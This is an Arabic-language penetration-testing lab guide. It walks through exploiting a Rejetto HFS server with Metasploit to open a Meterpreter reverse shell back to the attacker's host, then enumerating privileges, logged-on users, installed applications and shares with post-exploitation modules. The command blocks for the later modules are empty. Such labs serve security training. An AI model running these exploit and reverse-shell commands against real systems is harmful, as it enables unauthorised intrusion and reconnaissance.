🧪 المختبر العملي 17: وحدات ما بعد الاستغلال في Windows (Windows Post Exploitation Modules Lab)

🎯 الهدف الأساسي: استخدام وحدات Metasploit لما بعد الاستغلال في أنظمة Windows لجمع معلومات مفصلة عن النظام بعد الحصول على وصول أولي (Initial Access)، مثل صلاحيات المستخدمين، المستخدمين المسجلين دخولهم، التطبيقات المثبتة، والمجلدات المشتركة.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح جلسة Meterpreter (مثلاً: windows/http/rejetto_hfs_exec من.

  • Meterpreter Payload: للحصول على تحكم كامل بعد الاستغلال.

  • Post-Exploitation Modules:

    • post/windows/gather/win_privs: لتعداد صلاحيات المستخدم الحالي.

    • post/windows/gather/logged_on_users: لتعداد المستخدمين المسجلين دخولهم.

    • post/windows/gather/enum_applications: لتعداد التطبيقات المثبتة.

    • post/windows/gather/enum_shares: لتعداد المجلدات المشتركة.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال (Exploitation)

  1. 🚀 بدء تشغيل MSFconsole والحصول على جلسة Meterpreter:

    • ابدأ msfconsole:

      msfconsole -q
    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال Rejetto HFS للحصول على Meterpreter:

      use exploit/windows/http/rejetto_hfs_exec
      set RHOSTS [Target_IP_Address]
      set LHOST [Your_Kali_IP_Address]
      set LPORT 4444
      set PAYLOAD windows/meterpreter/reverse_tcp
      exploit
    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Meterpreter session 1 opened.

  2. 🔧 إرسال جلسة Meterpreter إلى الخلفية:

    • لإرسال جلسة Meterpreter إلى الخلفية للعمل في msfconsole:

      background
    • إذا نفذت هذا الأمر، ستعود إلى موجه msf6> وستظل الجلسة نشطة.

    • للتحقق من الجلسات النشطة:

      sessions
    • ستظهر الجلسة رقم 1 كـ Meterpreter.

📊 مرحلة ما بعد الاستغلال (Post-Exploitation): جمع المعلومات

  1. 💡 تعداد صلاحيات المستخدم الحالي باستخدام post/windows/gather/win_privs:

    • 🔑 استخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستُظهر الوحدة صلاحيات المستخدم الذي تم تسجيل الدخول به (مثلاً: Administrator account: true, System account: false).

  2. 💡 تعداد المستخدمين المسجلين دخولهم باستخدام post/windows/gather/logged_on_users:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستُظهر الوحدة قائمة بالمستخدمين المسجلين دخولهم حالياً أو مؤخراً (مثلاً: Administrator).

  3. 💡 تعداد التطبيقات المثبتة باستخدام post/windows/gather/enum_applications:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستُظهر الوحدة قائمة بجميع التطبيقات المثبتة وإصداراتها (مثلاً: AWS PV Drivers 8.3.3). 🔗 ربط سلسلة الأدوات: هذه المعلومات قد تقود إلى ثغرات جديدة لرفع الصلاحيات.

  4. 💡 تعداد المجلدات المشتركة باستخدام post/windows/gather/enum_shares:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستُظهر الوحدة قائمة بالمجلدات المشتركة على النظام (مثلاً: Print$).

نقاط التحقق:

  • يجب الحصول على جلسة Meterpreter أولية.

  • يجب أن تتمكن من تعداد صلاحيات المستخدم، المستخدمين المسجلين دخولهم، التطبيقات المثبتة، والمجلدات المشتركة .

Last updated